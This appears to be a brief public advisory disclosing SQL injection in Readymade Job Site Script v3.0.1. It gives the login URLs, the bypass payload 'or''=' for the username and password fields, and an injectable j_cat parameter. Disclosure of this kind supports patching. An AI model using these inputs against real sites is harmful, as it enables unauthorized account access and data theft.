Readymade Job Site Script version 3.0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
11b4a25c0f5b8adc6a3ea0def952a909a1edbd314c09e688082c25c68b6da4d2
################################################
#Title: READYMADE JOB SITE SCRIPT v3.0.1 - Authentication Bypass & SQL
injection
#Credit: Bilal KARDADOU
#Vendor: http://www.2daybiz.com
#Vendor URL:
http://www.2daybiz.com/content/products/40-readymade-job-site-script.php
#Product: READYMADE JOB SITE SCRIPT v3.0.1
#Google Dork: N/A
################################################
#
# Product & Service Introduction:
#
# Our Readymade PHP job site script make your own job portal website set
in motion,
# with our advanced PHP job site script that helps job seekers to search
jobs in efficient manner.
# Job portal script are developed in such way that has functionalities
similar to leading job portal like Naukri.com, Monster.com, etc..,
# our script offer various services for employers as well as job seekers.
#
#
# http://localhost/eboss/employer/employer_login.php
# http://localhost/eboss/seeker_login.php
#
# Username: 'or''='
# Password: 'or''='
#
#
# --SQL Injection--
# http://localhost/eboss/job_search_result.php?j_cat=11[SQL]&no_no=1
#
# PoC:
# http://prnt.sc/ekcek6
#
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################
--
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |